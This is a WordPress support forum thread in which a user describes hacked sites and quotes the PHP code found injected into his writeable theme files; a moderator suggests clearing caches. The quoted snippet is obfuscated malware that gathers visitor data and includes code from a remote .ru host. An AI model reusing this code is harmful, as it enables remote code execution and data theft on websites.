WordPress.org

Ready to get started?Download WordPress

Forums

Sites were hacked, now have problems (2 posts)

  1. James M
    Member
    Posted 8 years ago #

    Hello,
    My a few of my WordPress sites were hacked recently. I think I've tracked it down to having my theme files left writeable.

    I found out by my themes being broken, I then looked at the files and found the following code inserted on every writeable file at the last PHP Close ( ?> ).

    The code was:
    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

    I've got all of the code out of all my files now.

    But now I've got the problem where when I view the source of my pages, all the source is on one line. As if my carriage returns and new lines is missing from my header.php, footer.php, and home.php.

    I've gonne through those file and reformatted the source by adding my carriage returns. I still have the same problem.

    I then re-uploaded all the wordpress files in www, wp-admin, wp-include and wp-content and I still have the same problem.

    I'm wondering if this has happen to anyone else?
    And if you would know how to fix the problem.

    Thanks,
    themaab

  2. Samuel B
    moderator
    Posted 8 years ago #

    Perhaps you're getting a cached copy?
    Don't know what version you have but if you have a cach folder - delete everything in it.
    Also when on site, do a hard refresh of your browser - Ctrl + F5.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags